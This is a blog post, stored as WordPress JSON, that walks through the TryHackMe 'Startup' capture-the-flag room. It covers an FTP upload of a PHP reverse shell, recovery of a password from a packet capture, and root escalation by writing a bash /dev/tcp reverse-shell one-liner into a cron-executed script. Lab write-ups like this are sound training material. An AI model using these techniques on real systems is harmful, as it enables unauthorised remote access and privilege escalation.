{"id":457,"date":"2023-03-04T22:06:19","date_gmt":"2023-03-04T21:06:19","guid":{"rendered":"https:\/\/babdcatha.net\/?p=457"},"modified":"2023-03-05T00:22:41","modified_gmt":"2023-03-04T23:22:41","slug":"tryhackme-startup","status":"publish","type":"post","link":"https:\/\/babdcatha.net\/index.php\/2023\/03\/04\/tryhackme-startup\/","title":{"rendered":"TryHackMe : Startup"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Hello people, today we take a look at the <a href=\"https:\/\/tryhackme.com\/room\/startup\">Startup<\/a> room on TryHackMe. This room is about a startup that wants to see if we can get into their system. Here are the different parts of this writeup if you want to skip ahead :<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"#first_access\">First access<\/a><\/li>\n\n\n\n<li><a href=\"#user_flag\">User flag<\/a><\/li>\n\n\n\n<li><a href=\"#getting_root\">Getting root<\/a><\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"first_access\">First access<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">As usual, we start by running a full nmap scan on the target device :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-1\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"471\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/nmap-1.png\" alt=\"\" class=\"wp-image-461\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/nmap-1.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/nmap-1-300x147.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/nmap-1-768x377.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">This time, we can find a web server, an FTP server and the machine has SSH enabled. 
Let&#8217;s see what we can find on the FTP server if we connect as the anonymous user :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-2\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"612\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/ftp.png\" alt=\"\" class=\"wp-image-463\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/ftp.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/ftp-300x191.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/ftp-768x490.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Two files : <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">important.jpg<\/mark> and <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">notice.txt<\/mark>. Here is the image :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-3\"><img loading=\"lazy\" decoding=\"async\" width=\"735\" height=\"458\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/important.png\" alt=\"\" class=\"wp-image-465\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/important.png 735w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/important-300x187.png 300w\" sizes=\"auto, (max-width: 735px) 100vw, 735px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">And the text file says :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">Whoever is leaving these damn Among Us memes in this share, it IS NOT FUNNY. People downloading documents from our website will think we are a joke! Now I dont know who it is, but Maya is looking pretty sus.<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Maybe <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">Maya<\/mark> is a user on this machine ? 
We should keep this name in mind.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">In the meantime, we can take a look at the website :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-4\"><img loading=\"lazy\" decoding=\"async\" width=\"962\" height=\"944\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/initial_site.png\" alt=\"\" class=\"wp-image-468\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/initial_site.png 962w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/initial_site-300x294.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/initial_site-768x754.png 768w\" sizes=\"auto, (max-width: 962px) 100vw, 962px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Nothing fancy here, just a maintenance message. Let&#8217;s try to find hidden directories with gobuster :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-5\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"471\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/gobuster.png\" alt=\"\" class=\"wp-image-471\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/gobuster.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/gobuster-300x147.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/gobuster-768x377.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">One interesting result : the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">\/files<\/mark> directory. 
If we visit it, we see that it looks like a mirror for the ftp server.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-6\"><img loading=\"lazy\" decoding=\"async\" width=\"962\" height=\"473\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/website_files.png\" alt=\"\" class=\"wp-image-472\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/website_files.png 962w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/website_files-300x148.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/website_files-768x378.png 768w\" sizes=\"auto, (max-width: 962px) 100vw, 962px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Not a lot to see here, the ftp directory is empty. Maybe we can use the ftp server to upload a php shell here ? Unfortunately, the anonymous account does not have permissions to create files on the server, so we&#8217;ll have to find another way in.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">What can we try next ? Maybe Maya has a weak password ? Let&#8217;s try it on the ftp server first : nothing. On the SSH server : nothing either. We must have missed something !<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">When we checked for write permission on the FTP server, we only looked at the main folder, but, if we try to upload something to the ftp folder, we succeed ! 
That means that we can now upload our php shell and execute it to get a reverse shell :<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Once we have uploaded our payload, we visit <a href=\"http:\/\/$MACHINE_IP\/files\/ftp\/shell.phtml\">http:\/\/$MACHINE_IP\/files\/ftp\/shell.phtml<\/a>, and we get our reverse shell as the www-data user, and, if we look at the root directory, we can see the secret ingredient used in their soup :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-7\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"822\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/rev_shell_1_blur.png\" alt=\"\" class=\"wp-image-481\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/rev_shell_1_blur.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/rev_shell_1_blur-300x257.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/rev_shell_1_blur-768x658.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Yay ! We got our first flag. Now, it&#8217;s time to find the user flag !<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"user_flag\">User flag<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">When looking around the system, we found another user : lennie, but we couldn&#8217;t access its home directory. We must find a way in.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">One thing immediately jumps out : there is an <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">incidents<\/mark> folder in the root directory, which contains a pcapng file. We can download it by running<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">python3 -m http.server 4454<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">on the target machine, in the incidents directory, and then visiting <a href=\"http:\/\/$MACHINE_IP:4454\/\">http:\/\/$MACHINE_IP:4454\/<\/a>. 
We can now open it in Wireshark and analyze it. When we look at the seventh TCP stream (using the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">tcp.stream eq 7<\/mark> filter), we can see the command prompt a previous hacker seems to have used, and we see that the hacker tried to use a password for the www-data user, but that it didn&#8217;t work. This could be just a guess, but the password looks a bit too suspicious for that. Maybe he was actually using it on the wrong account ?<\/p>\n\n\n\n<figure class=\"wp-block-image size-large wp-duotone-unset-8\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"752\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/wireshark_blur-1024x752.png\" alt=\"\" class=\"wp-image-485\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/wireshark_blur-1024x752.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/wireshark_blur-300x220.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/wireshark_blur-768x564.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/wireshark_blur.png 1283w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">And indeed, if we try to ssh into lennie&#8217;s session using this password, we get in ! 
We can now get the user flag :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-9\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"592\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/user_flag_blur.png\" alt=\"\" class=\"wp-image-487\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/user_flag_blur.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/user_flag_blur-300x185.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/user_flag_blur-768x474.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Hurray, we now have 2\/3 flags, one more to go !<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"getting_root\">Getting root<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Now, we have to find a way to elevate our privileges. We unfortunately cannot run sudo on this machine as lennie, so that is out. When we look into our home directory, we find a <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">scripts<\/mark> directory, which contains scripts owned by root !<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">planner.sh :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">#!\/bin\/bash\necho $LIST > \/home\/lennie\/scripts\/startup_list.txt\n\/etc\/print.sh<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">startup_list.sh :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\"><\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\/etc\/print.sh :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">#!\/bin\/bash\necho \"Done!\"<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">It looks like planner writes a list of commands into startup_list.sh, and, since we can control the $LIST environment variable, we can write anything we want into startup_list.sh, can&#8217;t we ? 
Well, the only problem is that startup_list.sh is owned by root and only modifiable by root, so this won&#8217;t help us here. We can write to \/etc\/print.sh, but what good does that do if root does not execute the script ? Let&#8217;s try to find out if this happens before modifying it. To do that, we can use <a href=\"https:\/\/github.com\/DominicBreuker\/pspy\">pspy<\/a> to see all the running processes on the machine, and hopefully see if root is running this script from time to time.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-10\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"471\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/pspy.png\" alt=\"\" class=\"wp-image-499\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/pspy.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/pspy-300x147.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/pspy-768x377.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Here, we can see that every minute, root executes the planner.sh script, which executes the print.sh script that we can modify. So, if we write a reverse shell into the latter, we should be able to get a root shell on our machine :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">echo \"bash -i >&amp; \/dev\/tcp\/$MACHINE_IP\/$PORT 0>&amp;1\" > \/etc\/print.sh<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">And it works ! 
We can now read the last flag on this machine :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-11\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"471\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/root_flag_blur.png\" alt=\"\" class=\"wp-image-501\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/root_flag_blur.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/root_flag_blur-300x147.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/root_flag_blur-768x377.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Yay ! We completed this machine ! I hope you had fun, and that I will see you again here \ud83d\ude42<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Hello people, today we take a look at the Startup room on TryHackMe. This room is about a startup that wants to see if we can get into their system. Here are the different parts of this writeup if you want to skip ahead : First access As usual, we start by running a full 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[4],"tags":[39,41,40,38,8,42],"class_list":["post-457","post","type-post","status-publish","format-standard","hentry","category-writeups","tag-cronjobs","tag-ftp","tag-php","tag-pspy","tag-tryhackme","tag-wireshark"],"featured_image_src":null,"author_info":{"display_name":"BabdCatha","author_link":"https:\/\/babdcatha.net\/index.php\/author\/admin4804\/"},"_links":{"self":[{"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/posts\/457","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/comments?post=457"}],"version-history":[{"count":33,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/posts\/457\/revisions"}],"predecessor-version":[{"id":502,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/posts\/457\/revisions\/502"}],"wp:attachment":[{"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/media?parent=457"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/categories?post=457"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/tags?post=457"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}